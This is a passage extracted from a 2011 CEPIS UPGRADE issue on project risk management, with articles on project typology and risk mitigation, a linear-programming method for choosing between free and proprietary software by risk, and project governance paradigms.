Table 1: Types of Projects. (Source: [2, p. 4].)
2 Project Typology
Whilst the definition of a project as a temporary activity
with a start and finish implies that each project will be different in some way from previous projects, there are many
which share common characteristics. Table 1 shows the most
commonly experienced projects, informed by finance professionals in a recent survey. Each is marked with a suit
from a pack of cards which attempts to classify projects as
follows:
„ Hearts – need to engage participants hearts and minds
to succeed
„ Clubs – need to work to a fixed schedule of events
„ Diamonds – products need to capture the imagination and look attractive in the marketplace
„ Spades – physical structures e.g. buildings, roads,
bridges, tunnels
This article features three types of project (1, 2 and 6)
shown in Table 1 to give a flavour of the research findings.
3 Project Appraisal and Selection
In order to generate a suitable project proposal for this
purpose, the project needs to be scoped and alternative options may need to be developed from which the most suitable option may be selected. The way the project is defined
and described in presenting a business case for investment
can influence decision makers. It is important for senior
managers, both financial and non-financial to understand
the underlying psychological issues in managerial judgement, such as heuristics (using mental models, personal bias
and rules of thumb), framing (use of positive, negative or
emotive language in the presentation of data) and consen-
76
CEPIS UPGRADE Vol. XII, No. 5, December 2011
sus (use of political lobbying and social practice to build
support for a case). These behaviours can be positively encouraged to draw on the valuable knowledge and experience of organisational members, or impact negatively, for
example status quo bias creating barriers to change [3].
In many organisations it is possible to observe bottomup ideas being translated into approved projects by a team
at business unit level working up a business case to justify
a proposal using standard capital budgeting templates and
procedures for group board approval (Figure 1). There are
feedback loops and projects may be delayed while sufficient information is gathered, analysed and presented. This
process can take days (for example corporate events),
months (for example new client or business development)
or even years (for example new products where health and
safety features in approval such as drugs or aeroplanes).
Where delay is feasible, where the opportunity will not be
lost in competitive market situations, a real options approach
is possible. The use of the term real options here is an approach or way of thinking, not a calculable risk as in derivatives. It simply means that there is an option to delay,
disaggregate or redefine the project decision to maximise the
benefit of options, for example to build in embedded opportunities for further business. This may be more important in difficult economic times as capital may be rationed.
However, where projects are initiated by senior management in a top-down process, the usual steps in capital
investment appraisal may not be followed, as there may be
external pressure brought to bear on a chief executive or
finance director, for example in business acquisitions, strategic alliances etc. Appraisal procedures may be over-rid-
Farewell Edition
© Novática
Risk Management
“
Performance of projects has typically been measured
by the three constraints of time, money and quality
”
Figure 1: IT Project Risk Map. (Source [4].)
© Novática
Farewell Edition
CEPIS UPGRADE Vol. XII, No. 5, December 2011
77
Risk Management
PROJECT RISK ATTRIBUTES
CORPORATE FACTORS:
Strategic fit
Expertise
Impact
Brief Definition
Potential contribution to strategy
Level of expertise available compared to need
Potential impact on company/brand reputation
PROJECT OPPORTUNITY:
Size
Complexity
Planning timescale
Quality of customer/supplier
EXTERNAL FACTORS:
Cultural fit
Quality of information
Demands of customer(s)
Environmental
Scale of investment, time and volume of work
Number of and association between
assumptions
Time available to develop proposal pre-decision
Credit checking etc. added during version 4
updates
Matching set of values, beliefs & practices of
parties
Reliability, validity & sufficiency of base data
Challenge posed by specific customer
requirements
Likely impact of PEST factors, inc. TUPE
COMPETITIVE POSITION:
Market strength
Proposed contract terms
Power position of company in contract
negotiations
Likely contract terms and possible risk
transference
Table 2: Project Risk Attributes for Business Development Projects. (Source: adapted from [4].)
den or hi-jacked in such cases, with often negative consequences in terms of shareholder value. The justification for
such projects is often argued on a financial basis, but evidence
shows that the target company shareholders make more money
out of these than those in the bidding company. This is a key
risk that may be picked up by internal audit.
4 Risk Analysis
There is a common risk management framework in business organisations that can be applied to projects as well as
continuing operations. The number and labelling of steps
might differ, but the process usually involves:
1. Identify risks (where will the risk come from?)
2. Assess or evaluate risks (quantify and/or prioritise)
3. Respond to risks (take decisions e.g. avoid, mitigate
or limit effect)
“
A new project
risk assessment technique
(Pragmatix®) has been
developed to overcome
these problems
”
78
CEPIS UPGRADE Vol. XII, No. 5, December 2011
4. Take action to manage risks (adopt risk management
strategies)
5. Monitor and review risks (update risk assessment
and evaluate risk strategies)
Linking these to the project life cycle, steps 1 and 2
form the risk analysis that should be undertaken during the
project initiation stage, step 3 links to the planning stage,
and steps 4 and 5 should occur during project execution.
Risks should also be reviewed as part of the project review
stage to improve project risk management knowledge and
skills for the future [2].
Evidence from practice suggests that steps 1 and 2 are
rarely carried out early enough in the project life cycle, step
5 monitoring is often undertaken in a fairly mechanical way,
and comprehensive review at project level is hardly found
to occur at all after the project has ended, especially in nonproject based organisations.
The difficulty in identifying the risks relating to projects,
especially at an early stage when the project may not be
well defined, is that no two projects are exactly the same.
However, using the project typology in box 1 it can be seen
that headline or strategic risks are likely to be similar for projects
of a similar type. In [9] a range of qualitative methods for
project risk identification is presented, including cognitive
mapping, and examples are given for several types of project.
Farewell Edition
© Novática
Risk Management
Figure 2: IT Project Risk Map.
Knowledge of where the risks are likely to come from is
usually developed intuitively by managers through their
experience in the organisation and industry. Advanced methods used in the research reported here included repertory
grid1 and cognitive mapping2 techniques to elicit this valuable knowledge. However common risks may be found in
projects of a similar type, and up to half may be identified
by applying common management techniques. These are
explained for the three project examples presented.
Source of Risk
Employees
Loss of staff
Loss of expertise
Effect on morale
Poor
local
labour
market
Management
Leadership
Continuity
Current projects
Organisational impact
Culture
Business procedures
Infrastructure
Office equipment
Capacity
1
Repertory grid technique (RGT) is a method of discovering how
people subconsciously make sense of a complex topic from their
range of experience. This was used to identify the project risk attributes in Table 2.
2
Cognitive mapping uses a visual representation of concepts
around a central theme. This was used to display risk attributes in
a project risk map in figure 2.
Mitigating actions
Offer positive and consistent benefits package
Negotiate key employees benefits package to encourage
move
Good communications with staff & transparency of business
case
Establish good market intelligence (before choice of location)
Establish dedicated project management team with strong
leader
Maintain extra resources during move
Flex project schedules for projects spanning relocation period
Use relocation as a catalyst for change, improve existing
culture
Requires a development plan
Transport all office equipment from current site, reduce need
for new
Determine capacity required and ensure building completed
in time
Table 3: Mitigating Actions. (Source: adapted from unpublished MBA group coursework with permission.)
© Novática
Farewell Edition
CEPIS UPGRADE Vol. XII, No. 5, December 2011
79
Risk Management
Example 1: Business Development Projects (BDP)
These projects involve securing new customers and
markets for existing products or services. The strategic analysis of the organisational and environmental context for a
BDP can help to generate several possible risks. The analysis of strengths, weaknesses, opportunities and threats
(SWOT) can identify risk areas for the organisation (corporate factors in table A), and help to analysis the strategic fit
of the project. Then a more detailed analysis of the external
factors, political, economic, social, technical, legal and environmental (PESTLE) can identify further risk areas (external and market factors in Table 2). The invitation to tender might also help to identify risks in a BDP project, for
example the ‘demands of the customer’ in Table 2.
Example 2: Systems Development or IT Projects
For an IT project, which is essentially a supply problem,
the chain from software supplier to client (users) via sponsor (owner) can reveal at least half of the sources of risk.
The functional requirements of the system are defined by
the client, and the risks here may determine whether the
client will be satisfied that the system does what it is supposed to do. Internal clients in IT projects may be more demanding than external clients in BDP projects.
Figure 2 shows a typical project risk map for an IT
project. The figure shows the high risk areas shaded darker
and the lower risk areas lighter. The key to managing these
risks is understanding and responding to stakeholder
motivations and expectations.
Example 3: New Site or Relocation Projects
A new site may involve the choice of location, acquisition, construction or refurbishment of buildings. In a relocation project, stakeholder analysis can reveal key groups
of people who need managing closely. The employees are
the principal group, followed by management and customers (continuity). Infrastructure risks (geographic factors) may
be revealed by PESTLE analysis. Table 3 shows how risk
management strategies can be developed to mitigate these
risks.
The final section of this article shows the analysis of
100 risk management strategies into six categories, and draws
conclusions for the use of a strategic approach to project
risk identification, assessment and management [1].
“
Project reviews
are recommended to evaluate
how well risk management
strategies have worked
”
80
CEPIS UPGRADE Vol. XII, No. 5, December 2011
“
The final section of this
article shows the analysis
of 100 risk management
strategies into six
categories
”
5 Risk Management Strategies
For each type of project covered in the research a set of
risk management strategies like those shown in Table 3 were
identified. These totalled 100 and the following six categories emerge from their analysis, in the order of frequency
of observation:
1: Project Management (23%)
This category includes the deployment of project management methodologies such as work breakdown structure,
scheduling, critical path analysis etc. and the establishment
of a project leader and project team, as found in the PM
body of knowledge. The most observations for this type of
risk management strategy were in IT projects, relocation
and events management, where timing is critical.
2: Human Resource Management (21%)
This category includes recruitment, training and development of personnel, including managers and the management of change in work practices. This type of strategy featured most strongly in acquisitions, IT projects and relocation.
3: Stakeholder Management (19%)
This category includes stakeholder analysis and management through consultation, relationship management and
communications. It featured most strongly in systems development projects, NPD projects and events management,
which are necessarily customer-focussed. In IT projects and
events management there are many more stakeholder groups
with diverse interests to manage.
4: Knowledge Management (18%)
This category includes searching for information, recording, analysing, sharing and documenting information,
for example in market research and feasibility studies. It
features most strongly in BDP and NPD projects and in
acquisitions. It is closely related to training and development, so overlaps with that aspect of human resource management.
5: Financial Management (10%)
This category includes credit checking of suppliers and
customers, financial modelling and budget management as
well as business valuation, pricing strategies and contract
terms. It is no surprise that it features most in business acquisitions, where a high level of financial expertise is required, and next in BDPs where terms are agreed and new
customers vetted.
Farewell Edition
© Novática
Risk Management
6: Trials and Pilot Testing (9%)
This category includes testing ideas at the feasibility
study stage, testing possible solutions and new products.
This could be clinical trials in pharmaceuticals, tasting panels
with new food products or system testing in IT products, so
features most strongly in IT and NPD projects.
Project reviews are recommended to evaluate how well
risk management strategies have worked and to identify how
risk management can be improved as part of organisation
learning. The evaluation of Pragmatix® for risk identification, assessment and management revealed important benefits for the case organisation, not least the opportunity to
link risk assessment to later project management and post
audit review of projects. This joined up thinking links strategic choice to strategy implementation through project
management.
In conclusion, the identification of likely risks at an early
stage helps managers make better decisions in the face of
uncertainty. However, unless these risks are fully appraised
and communicated to those responsible for managing the
implementation of the project and monitoring the risks, the
full benefits of risk appraisal will not be realised.
References
[1] E. Harris. Strategic Project Risk Appraisal and Management, Farnham: Gower (Advances in Project Management series), 2009.
[2] E.P. Harris. Project Management, London: ICAEW Finance & Management special report SR33, 2011.
[3] E. Harris, C.R. Emmanuel, S. Komakech. "Managerial Judgement and Strategic Investment Decisions",
Oxford: Elsevier, 2009.
[4] E.P. Harris. "Project Risk Assessment: A European
Field Study", British Accounting Review, Vol. 31, No.
3, pp.347-371, 1999.
© Novática
Farewell Edition
CEPIS UPGRADE Vol. XII, No. 5, December 2011
81
Risk Management
Selection of Project Alternatives while Considering Risks
Marta Fernández-Diego and Nolberto Munier
The selection of projects consists in choosing the most suitable out of a portfolio of projects, or the most fitting alternative
when there are constraints in regard to financing, commercial, environmental, technical, capacity, location, etc.. Unfortunately the selection process does not place the same importance on the various risks inherent in any project. It is possible
however, to determine quantitative values of risk for each pair of alternative/threat in order to assess these risk constraints.
Keywords: Free Software, Linear Programming,
Project, Risk Management, Threat.
1 Introduction
Failing to satisfy project objectives is a major concern
in project management. Risks can generate problems with
consequences that are not often considered, and indeed, in
many cases risk management is not even taken into account
[1]. However, the benefits of risk management are considerable. Risk management allows, at the beginning of the
project, the detection of problems that could be otherwise
ignored, and so effectively to help the Project Manager in
delivering the project on time, under budget and with the
required quality [2]. However, if risk management is not
performed along the whole project, the Project Manager
probably will not be able to take advantage of its full benefits.
This paper proposes a methodology that consists in building, from a final value of risk for each project pair (threat
or alternative) and a decision matrix to determine, using
Linear Programming (LP), which is the most effective alternative considering the risks. Of course, in a real case these
same constraints, plus others, can be added to the battery of
constraints that address environmental matters, economic,
technical, financial, political, and so on. The result will reflect the best selection on the basis of all the constraints
considered simultaneously.
The application of LP to this decision-making problem
is new in the treatment of risk. It opens a series of possibilities in the field of risk management in such a way that this
methodology represents more accurately than other methods a project’s features, solving problems with all kinds of
constraints, including those related to risk, and therefore
placing risks at the same level as the economic, social and
environmental constraints normally considered, with the idea
of raising the discipline of risk management in projects. In
short, although an even higher level of organizational maturity in terms of risk management would correspond to the
integrated risk management of the portfolio of projects, it is
expected that the outcome will be projects driven by risk
management [3].
82
CEPIS UPGRADE Vol. XII, No. 5, December 2011
Authors
Marta Fernández-Diego holds a European PhD in Electronic
and Telecommunications Engineering. After some research and
development contracts in universities and multinational
companies from France, Great Britain and Spain, she is currently
a lecturer in the Department of Business Organization at
Universitat Politècnica de València, Spain, where she teaches
project risk management, among other subjects. <marferdi@
doe.upv.es>.
Nolberto Munier is a Mechanical Engineer, Master in Project
Management and PhD in Design, Manufacturing and
Management of Industrial Projects. He has worked extensively
in linear programming techniques and applied them to solving
decision problems in urban projects in several cities in different
countries. In addition, he developed a methodology called Simus
for solving problems of a complex nature, with multiple
objectives and with any type of constraints. He is currently an
international consultant on issues of urban and regional planning.
<[email protected]>.
The paper presents in the next section an application
example. The following describes in detail the characteristics of the problem to determine the choice of one alternative or another according to various criteria, along with its
constraints. Finally, once the problem is solved by LP, the
results are discussed.
“
This paper proposes a
methodology that consists
in building the most effective
alternative considering
the risk
”
Farewell Edition
© Novática
Risk Management
“
Failing to satisfy project
objectives is a major concern
in project management
”
2 Application Example
2.1 Background
In the past decade, free software has exploded, even challenging the inertia that still exists in software engineering,
mainly derived from proprietary software, resulting in new
business models and product offerings that enable real choice
for consumers.
To understand free software, let us begin by clarifying
that the fundamental characteristic of proprietary software
is that all ownership rights therein are exclusively held by
the owner, as well as any possibility of improvement or adaptation. The user merely pays for the right to use the product, rather than buyiong it outright.
The problems associated with software, regardless of
whether free or proprietary, lie in its own nature. The key
problem addressed by free software is precisely the possibility of reusing it, in the logical sense that you can use parts
already coded by others and create derivatives. For any transformation of a person´s work authorization of the copyright
holder is required. Instead of using the simple copyright of
the proprietary software licenses which means “all rights
reserved”, these other free software licenses only reserve
some rights, and report whether or not to allow the user to
make copies, create derivative works such as adaptations or
translations, or give commercial uses to the copies or derivatives.
In contrast, the essential feature of free software is that
it is freely used [4]. Specifically, it allows the user to exercise four basic freedoms. These freedoms are:
„ The freedom to run the program for any purpose,
„ The freedom to study how the program works, and
change it to make it do what you wish,
„ The freedom to redistribute copies,
Resistance
to change
Dependency
Lack of
security
„ The freedom to improve the program, and release
your improvements to the user.
Open source code1 is required to meet these freedoms.
With open source code we mean that the source code is
always available with the program. In addition, the exercise of these freedoms facilitates software evolution, exposing it as much as possible to its use and change – because greater exposure means that the software receives
more testing – and by removing artificial constraints to the
evolution – being more subject to the environment.
2.2 Background of the Case: Alternatives and
Objective
Considering the future commercialization of computer
models with free software preinstalled, an entrepreneur, who
plans to start a small business, analyzes the possibility of
buying for his business computers with free software installed. Given this possibility, he needs to make a decision
between both alternatives, that is, proprietary software or
free software according to risk criteria, with the objective
consisting in minimizing the total cost, taking into account
an estimated difference of 100• favoring a computer with
free software operating system.
1
Text written using the format and syntax of the programming language with instructions to be followed in order to implementthe
program.
“
If risk management is not
performed along the
whole project, the Project
Manager probably will not
be able to take advantage
of its full benefits
”
x1 (Free
software)
x2 (Proprietary
software)
Action
Operator
B
Threshold
0.85
0.15
MIN
≥
0.15
0.16
0.64
MIN
≥
0.16
0.125
0.375
MIN
≥
0.125
Table 1: Characteristics of the Problem.
© Novática
Farewell Edition
CEPIS UPGRADE Vol. XII, No. 5, December 2011
83
Risk Management
“
There is a widely held belief that free software operating
systems are inherently more secure than a proprietary one
3 Problem Characteristics
The characteristics of the problem are summarized in
Table 1.
The options and constraints of the problem, reflected in
this table, are explained in the following points.
3.1 Criteria
This case raises two alternatives, effectively two projects
which will be analyzed on the basis of criteria that take into
account the various risks covered by both projects. Specifically, we consider three selection criteria that correspond to
three of the potential threats related to the software, and
which are mirrored in the main differences between free
software and proprietary software. Of course, in a real case
there may be many other criteria related to the economy,
availability and experience of personnel, environment, etc.,
but all are considered simultaneously, together with the risk
criteria. Therefore, the alternatives or options will have to
comply simultaneously with all factors.
The risk in a project involves a deviation from its objectives in terms of the three major project success criteria;
schedule, cost and functionality. In this sense, risk indicates
the probability that something can happen which endangers the project outcome.
Risk can be measured as the combination of the probability that an incident occurs and the severity of impact
[5]. Mathematically, risk can be expressed as follows:
(1)
In the certainty of the materialization of the threat, the
risk would be equal to the impact; if the probability of the
threat materialization is zero, then there is no risk at all.
However, risk is a combination of both probability and impact, and in statistics, risk is often modeled as the expected
value of some impact. This combines the probabilities of various possible threats and some assessment of the corresponding outcomes into a single value. Consequently, each pair threat
contributes partially to this expected value or risk.
The threats considered, which appear as rows in Table
1, are as follows:
„ Resistance to change
It is clear that there is still a lot of inertia and reluctance
to move from the proprietary model, and despite the advantages of free software, this is the main barrier. Inertia is the
resistance of the user to give up something he knows (proprietary software), i.e. there is a resistance to change (to
free software), supported by the other side in the laws of
84
CEPIS UPGRADE Vol. XII, No. 5, December 2011
”
physics (e.g., resistance to initiate a movement).
Although the data are dependent on many factors including company size, the software’s purpose, its scope,
field of application, etc., 85% of small businesses would
opt for proprietary software products by inertia, lack of
knowledge about free software alternatives or simply the
fear of moving to a new field, compared with 15% who
would venture into something new. Therefore the likelihood of resistance to change for free software is higher
(85%) than the one for proprietary software (15%). On the
other hand, we consider both the impact is total, i.e. 100%,
since what is at stake is the choice of an alternative or another.
„ Dependency
A non-technical advantage of free software is its independence from the supplier, ensuring business continuity
even though the original manufacturer disappears.
Initially, free software arose from abusive practices used
by leading developers of proprietary software, which requires users to permanently buy all updates and upgrades;
in this sense the user has their hands tied since they have
very limited rights on the product purchased. But when companies turn to free software, they liberate themselves from
the constraints imposed by the software vendor. Indeed,
free software appears to ensure the user certain freedoms.
In addition the user is dependent not only on the manufacturer, but also on the manufacturer’s related products.
The product often works best with other products from the
same manufacturer. With free software, however, users have
the power to make their own decisions.
To simplify the problem equal values of probability and
impact have been considered, resulting in a dependency
risk of 16% for free software and 64% for proprietary software.
„ Lack of security
There is a widely held belief that free software operating systems are inherently more secure than a proprietary
one because of their Unix heritage, which was built specifically to provide a high degree of security. This statement can be justified as follows:
On the one hand, a coding error can potentially cause
security risk (such as problems due to lack of validation).
Free software is higher quality software, since more people
can see and test a set of code, improving the chance of detecting a failure and to correct it quickly. This means that
quality is assured by public review of the software and by
the open collaboration of a large number of people. This is
why free software is less vulnerable to viruses and malicious attacks.We could estimate that the vulnerability of
Farewell Edition
© Novática
Risk Management
that each threat brings for each alternative.
“
The main advantage
of Linear Programming is
that it is possible to represent
real world scenarios with
some degree of accuracy
”
free software against security issues is 25%, while for proprietary software such vulnerability amounts to 50%.
On the other hand, the impact of a security problem is
generally lower in the case of free software, because these
bugs are usually addressed with speedy fixes wherever possible because of an entire global community of developers
and users providing input. In contrast, in the world of proprietary software, security patches take considerably longer
to resolve. We might consider impacts 50% for free software and 75% for proprietary software.
In short, considering risk as a combination of vulnerability
and impact, the risk due to lack of security results in 12.5% for
free software versus 37.5% for proprietary software.
Furthermore, since in fact transparency hinders the introduction of malicious code, free software is usually more
secure.
3.2 Constraints
Since in the three cases we are talking of negative events,
or threats, and we have not considered any opportunity, the
constraints that we impose on these criteria respond to minimization, effectively finding a solution greater than or equal
the value of minimal risk, since we cannot find a solution
with lower risk than this.
For example, the opposite of resistance to change could
have been considered. The term inertia may refer to the difficulty in accepting a change. While not applying any force,
we follow our own inertia, which is an opportunity for the
favored option. In this approach, the appropriate action had
been to maximize, or find a solution less than or equal to the
maximum benefit because we cannot find a solution with
greater benefit.
4 Linear Programming Resolution
The matrix expression of the LP problem is as follows:
(2)
Where:
is the decision matrix, shown boxed in Table 1.
The components Aij of this matrix are the values of risk
© Novática
Farewell Edition
is the vector of unknowns, i.e. the option to choose in
this case.
is the vector of thresholds, i.e. the limits of each constraint according to the discussion in Section 3.2.
To meet the objective of minimizing the objective function Z, this objective function is expressed as the sum of
the products between the cost of each alternative for the
value of each of them (i.e. the unknown X represents what
we wish to determine).
Thus, assuming that the cost of a computer with free
software operating system preinstalled is 600 • and the one
for proprietary software is 700 •, the objective function is:
(3)
Applying the LP simplex method [6] which is essentially a repeated matrix inversion (2) according to certain
rules, one gets, if it exists, the optimal solution of the problem. That is, the best combination or selection of alternatives to optimize the objective function (3).
5 Discussion of Results
5.1 Optimal Solution
The optimal solution to the LP problem is as follows:
(4)
We choose the higher value because, although both contribute to obtaining the goal, if only one option is actually
possible it is clear that the one with the higher value contributes more efficiently than the other and therefore is chosen.; In the case above, proprietary software (x2) should be
chosen.
In our case both values are very close but since the LP
indicates that the alternative with proprietary software contributes more efficiently to the objective, taking into account risk constraints, it is chosen.
5.2 Dual Problem
Every direct LP problem, such as this one, can be converted into ‘his image’, which is called the ‘dual problem’.
In the dual problem the columns represent threats while the
rows represent the alternatives. While the direct problem
variables indicate which option contributes best to the goal,
the dual problem variables provide us with the values of
the ‘marginal contributions of each constraint’ or ‘shadow
prices’, which is an economic term. In essence, this means
knowing how much the objective function changes per unit
variation in a constraint, which ultimately gives an idea of
the importance of each constraint.
In this case we obtain the results shown in Table 2.
CEPIS UPGRADE Vol. XII, No. 5, December 2011
85
Risk Management
“
Another major advantage of LP is that, if there is a solution,
this is optimal. i.e. the solution cannot be improved
”
Lack of security
Dependency
Resistance to change
Equal
value
0.125
0.207
0.150
Marginal value
1683.333
0,000
458.333
Table 2: Equal Value and Marginal Value.
It turns out that the problem of lack of security is the
most decisive in the choice of the alternatives, while resistance to change comes in a second place, which intuitively
might be seen as the most decisive.The problem of dependency does not affect the solution since its marginal value is
zero.
This powerful tool will allow, for example, a discussion
of the cost difference that makes the solution change, and
thus the selection, making the selection of computers with
free software operating system preinstalled more interesting. Moreover, in this case we would observe that the component of inertia fails to be key or even to influence the
selection process, and the real criteria for selecting the alternative is in this case the security issue first, and the problem of dependency, second.
6 Conclusions
[4]
[5]
[6]
[7]
Projects. In D. Avison et al., eds. Advances in Information Systems Research, Education and Practice.
Boston: Springer, pp. 113-124, 2008.
R. M. Stallman. Free software, free society: Selected
Essays of Richard M. Stallman. GNU Press, 2002.
International Organization for Standardization. ISO
31000:2009 Risk management — Principles and guidelines, International Organization for Standardization,
2009.
G.B. Dantzig. Maximization of a linear function of variables subject to linear inequalities, 1947. Published
pp. 339-347 in T.C. Koopmans (ed.): Activity Analysis of Production and Allocation, New York-London
1951 (Wiley & Chapman-Hall).
N. Munier. A strategy for using multicriteria analysis
in decision-making. Springer – Dordrecht, Heidelberg,
London, New York, 2011.
The use of LP is a new application in the treatment of
risks in projects. Its main advantage is that it is possible to
represent real world scenarios with some degree of accuracy, as the number of constraints – and alternatives – can
be measured in the hundreds. On the other hand, when
analyzing the objective function for various scenarios it is
possible to infer which is the best option [7].
Another major advantage is that, if there is a solution,
this is optimal. i.e. the solution cannot be improved, thus
confirming the Pareto optimal.
References
[1] M. Fernández-Diego, N. Munier. Bases para la Gestión
de Riesgos en Proyectos 1st ed., Valencia, Spain:
Universitat Politècnica de València, 2010.
[2] Project Management Institute. Practice Standard for
Project Risk Management, Project Management Institute, 2009.
[3] M. Fernández-Diego, J. Marcelo-Cocho. Driving IS
86
CEPIS UPGRADE Vol. XII, No. 5, December 2011
Farewell Edition
© Novática
Risk Management
Project Governance1
Ralf Müller
Having a governance structure in organizations provides a framework to guide managers in decision making and action
taking and helps to alleviate the risk of conflicts and inconsistencies between the various means of achieving organizational goals such as processes and resources. This article introduces project governance, a major area of interest in
organizations, which is intended to guide, direct and lead project work in a more successful setting. To that purpose a new
three step governance model is presented and described.
Keywords: Behaviour Control, Framework for Governance, Governance Model for Project Management, Governance Structures, Outcome Control, Project Governance,
Project Management Action, Shareholder Orientation,
Stakeholder Orientation.
Governance starts at the corporate level and provides a
framework to guide managers in their daily work of decision making and action taking. At the level of projects governance is often implemented through defined policies, processes, roles and responsibilities, which set the framework
for peoples’ behaviour, which, in turn, influences the project.
Governance sets the boundaries for project management
action, by
„ Defining the objectives of a project. These should be
derived from the organization’s strategy and clearly outline
the specific contribution a project makes to the achievement of the strategic objectives
„ Providing the means to achieve those objectives. This
is the provision of or enabling the access to the resources
required by the project manager
„ Controlling progress. This is the evaluation of the
appropriate use of resources, processes, tools, techniques
and quality standards in the project.
Without a governance structure, an organization runs
the risk of conflicts and inconsistencies between the various means of achieving organizational goals, such as processes and resources, thereby causing costly inefficiencies
that negatively impact both smooth running and bottom line
profitability.
Approaches to governance vary by the particularities of
organizations. Some organizations are more shareholder
oriented than others, thus aim mainly for Return on Invest-
“
This article introduces
project governance,
a major area of
interest in organizations
© Novática
”
Farewell Edition
Author
Ralf Müller, PhD, is Professor of Business Administration at
Umeå University, Sweden, and Professor of Project Management
at BI Norwegian Business School, Norway. He lectures and
researches in governance and management of projects, as well
as in research methodologies. He is the (co)author of more than
100 publications and received, among others, the Project
Management Journal’s 2009 Paper of the Year, 2009 IRNOP’s
best conference paper award, and several Emerald Literati
Network Awards for outstanding journal papers and referee work.
He holds an MBA degree from Heriot Watt University and a
DBA degree from Henley Management College, Brunel
University, U.K. Before joining academia he spent 30 years in
the industry consulting large enterprises and governments in 47
different countries for their project management and governance.
He also held related line management positions, such as the
Worldwide Director of Project Management at NCR Teradata.
<[email protected]>
ment for their shareholder (i.e. having shareholder orientation), while others try to balance a wider set of objectives,
including societal goals or recognition as preferred employer
(i.e. having a stakeholder orientation). Within this continuum, the work in organizations might be controlled
through compliance with existing processes and procedures
(i.e. behaviour control), or by ensuring that work outcomes
meet expectations (i.e. outcome orientation). Four governance paradigms derive from that and are shown in Figure 1.
The Conformist paradigm emphasizes compliance with
existing work procedures to keep costs low. It is appropriate when the link between specific behaviour and project
outcome is well known. The Flexible Economist paradigm
is more outcomes-focused requiring a careful selection of
project management methodologies etc. in order to ensure
economic project delivery. Project managers in this para1 This article was previously published online in the “Advances in
Project Management” column of PM World Today (Vol. XII Issue III
- March 2010), <http://www.pmworldtoday.net/>. It is republished
with all permissions.
CEPIS UPGRADE Vol. XII, No. 5, December 2011
87
Risk Management
Outcom
e Control
Flexible
economist
Versatile
artist
Behaviour
Control
Shareholder Stakeholder
Orientation Orientation
Conformist
Agile
pragmatist
Figure 1: Four Project Governance Paradigms.
digm must be skilled, experienced and flexible and often
work autonomously to optimize shareholder returns through
professional management of their projects. The Versatile
Artist paradigm maximizes benefits by balancing the diverse
set of requirements arising from a number of different
stakeholders and their particular needs and desires. These
project managers are also very skilled, experienced and work
autonomously, but are expected to develop new or tailor
existing methodologies, processes or tools to economically
balance the diversity of requirements. Organizations using
this governance paradigm posses a very heterogeneous set
of projects in high technology or high risk environments.
The Agile Pragmatist paradigm is found when maximization
of technical usability is needed, often through a time-phased
approach to the development and product release of functionality over a period of time. Products developed in projects
under this paradigm grow from a core functionality, which
is developed first, to ever increasing features, which although
“
Governance provides a
framework to guide managers
in their daily work of decision
making and action taking
”
of a lesser and lesser importance to the core functionality,
enhance the product in flexibility, sophistication and easeof-use. These projects often use Agile/Scrum methods, with
the sponsor prioritising deliverables by business value over
a given timeframe.
Larger enterprises often apply different paradigms to
different parts of their organization. Maintenance organizations are often governed using the conformist or economist paradigms, while R&D organizations often use the versatile artist or agile pragmatist approach to project governance.
Governance is executed at all layers of the organizational hierarchy or in hierarchical relationships in organizational networks. It starts with the Board of Directors,
which defines the objectives of the company and the role
of projects in achieving these objectives. This implies decisions about the establishment of steering groups and
Project Management Offices (PMOs) as additional governance institutions. The former often being responsible for
the achievement of the project’s business case through direct governance of the project, by setting goals, providing
resources (mainly financial) and controlling progress. The
latter (the PMOs) are set up in a variety of structures and
mandates, in order to solve particular project related issues
within the organization. Some PMOs focus on more tactical tasks, like ensuring compliance of project managers with
existing methodologies and standards. That supports gov-
Figure 2: Framework for Governance of Project, Program and Portfolio Management.
88
CEPIS UPGRADE Vol. XII, No. 5, December 2011
Farewell Edition
© Novática
Risk Management
Figure 3: Model of Project Governance.
ernance along the behaviour control paradigms. Other PMOs
are more strategic in nature and perform stewardship roles
in project portfolio management and foster project management within the organization thereby supporting governance
along the outcome control paradigms. A further governance
task of the Board of Directors is the decision to adopt programme and/or portfolio management as a way to manage
the many projects simultaneously going on in an organization. Programme management is the governing body of the
projects within its programme, and portfolio management
the governing body of the groups of projects and programmes that make up the organization. They select and
prioritize the projects and programmes and with it their staffing.
How Much Project Management is enough for my
Organization?
This is addressed through governance of project management. Research showed that project-oriented companies
balance investments and returns in project management
through careful implementation of measures that address the
three forces that make them successful. These forces are
(see also Figure 2):
a) educated project managers. This determines what can
be done;
b) higher management demanding professionalism in
“
© Novática
project management. This determines what should be done;
and,
c) control of project management execution. This
shows what is done in an organization in terms of project
management.
Companies economize the investments in project management by using a three step process to migrate from process orientation to project orientation. Depending on their
particular needs they stop migration at step 1, 2 or 3 when
they have found the balance between investments in project
management (and improved project results) in relation to
the percentage of their business that is based on projects.
Organizations with only a small portion of their business
based on projects should invest less, and project-based organizations invest more in order to gain higher returns from
their investments. The three steps are (see also Figure 2):
Step 1: Basic training in project management, use of
steering groups, and audits of troubled projects. This
relativly small investment yields small returns and is appropriate for businesses with very little activities in projects
Step 2: all of step 1 plus project manager certification,
establishment of PMO, and mentor programs for project
managers. This medium level of investment yields higher
returns in terms of better project results and is appropriate
for organizations with a reasonable amount of their business being dependent on projects.
Approaches to governance vary by the particularities
of organizations
”
Farewell Edition
CEPIS UPGRADE Vol. XII, No. 5, December 2011
89
Risk Management
“
Companies economize the investments in project
management by using a three step process
”
Step 3: All of step 1 and 2 plus advanced training and
certification, benchmarking of project management capabilities, and use of project management maturity models.
This highest level of investment yields the highest returns
through better project results and is appropriate for projectbased organizations, or organizations whose results are significantly determined by their projects
The same concept applies for programme and portfolio
management. This allows the tailoring of efforts for governance of project, program and portfolio management to
the needs of the organization. By achieving a balance of
return and investment through the establishment of the three
elements of each step, organizations can become mindful of
their project management needs. Organizations can stop at
each step, after they have reached the appropriate amount
of project management for their business.
How does All that link together in an Organization?
The project governance hierarchy from the board of directors, via portfolio and program management, down to
steering groups is linked with governance of project management through the project governance paradigm (see Figure 3).
A paradigm such as the Conformist paradigm supports
project management approaches as described above in Step
1 of the three step governance model for project management, that is, methodology compliance, audits and steering
group observation. A Versatile Artist paradigm, on the other
hand, will foster autonomy and trust in the project manager,
and align the organization towards a ‘project-way-of-working’, where skilled and flexible project managers work autonomously on their projects.
The paradigm is set by management and the nature of
the business the company is in. The project governance paradigm influences the extent to which an organization implements steps 1 to 3 of the governance model for project management. It then synchronizes these project management
capabilities with the level of control and autonomy needed
for projects throughout the organization. This then becomes
the tool for linking capabilities with requirements in accordance with the wider corporate governance approach.
